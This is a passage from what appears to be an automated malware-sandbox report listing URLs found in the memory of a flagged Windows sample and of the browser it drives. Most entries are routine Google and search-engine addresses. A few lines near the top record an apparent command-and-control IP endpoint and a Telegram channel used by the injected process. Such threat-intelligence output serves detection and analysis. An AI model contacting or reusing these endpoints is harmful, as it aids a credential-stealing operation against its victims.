              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2204909957.000000000A154000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443hello
              Source: BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443hellohttps://t.me/b4cha00oomaino5Mozilla/5.0
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
              Source: chrome.exe, 00000006.00000002.2717416488.000042E80008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
              Source: chrome.exe, 00000006.00000002.2722634762.000042E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718652559.000042E8003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
              Source: chrome.exe, 00000006.00000002.2722665677.000042E800CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout1
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
              Source: chrome.exe, 00000006.00000003.2659385093.000042E80129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreporton/javascript
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
              Source: chrome.exe, 00000006.00000002.2717472573.000042E8000C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
              Source: chrome.exe, 00000006.00000002.2717472573.000042E8000C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
              Source: chrome.exe, 00000006.00000002.2717472573.000042E8000C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
              Source: chrome.exe, 00000006.00000002.2717416488.000042E80008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
              Source: chromecache_69.8.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_69.8.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmp, chromecache_70.8.dr, chromecache_69.8.drString found in binary or memory: https://apis.google.com
              Source: chrome.exe, 00000006.00000002.2737119276.000042E801AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719772728.000042E8006A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: chrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719097058.000042E8004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
              Source: chrome.exe, 00000006.00000002.2719356402.000042E800594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
              Source: chrome.exe, 00000006.00000002.2719356402.000042E800594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icoai
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: chrome.exe, 00000006.00000002.2722399214.000042E800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
              Source: chrome.exe, 00000006.00000002.2722399214.000042E800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: chrome.exe, 00000006.00000002.2721700817.000042E800BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
              Source: chrome.exe, 00000006.00000002.2721700817.000042E800BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
              Source: chrome.exe, 00000006.00000002.2721700817.000042E800BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
              Source: chrome.exe, 00000006.00000003.2650988862.000042E800C14000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
              Source: chrome.exe, 00000006.00000002.2719387751.000042E8005A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721069161.000042E800A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2726706198.000042E801128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: chrome.exe, 00000006.00000003.2652875720.000042E800D58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2650899768.000042E80033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2662343304.000042E800D2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2651797284.000042E800D58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2650955760.000042E800D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657164581.000042E80033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2652850765.000042E800D2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2650121588.000042E800D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2636055946.0000197800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
              Source: chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
              Source: chrome.exe, 00000006.00000002.2722576266.000042E800CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
              Source: chrome.exe, 00000006.00000002.2722576266.000042E800CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/B
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g1
              Source: chrome.exe, 00000006.00000003.2626577563.00001D90002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2626594713.00001D90002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
              Source: chrome.exe, 00000006.00000002.2719918783.000042E80070D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722399214.000042E800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719421995.000042E8005D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
              Source: chrome.exe, 00000006.00000002.2720375769.000042E80087C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
              Source: chrome.exe, 00000006.00000002.2720375769.000042E80087C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
              Source: chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
              Source: chromecache_69.8.drString found in binary or memory: https://clients6.google.com
              Source: chrome.exe, 00000006.00000002.2719647077.000042E80063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
              Source: chromecache_69.8.drString found in binary or memory: https://content.googleapis.com
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmp, jwb1ny.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chrome.exe, 00000006.00000002.2717695800.000042E80015C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
              Source: chrome.exe, 00000006.00000002.2717695800.000042E80015C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:
              Source: chrome.exe, 00000006.00000002.2721234935.000042E800AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
              Source: chrome.exe, 00000006.00000002.2718348673.000042E800310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718165993.000042E8002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722634762.000042E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
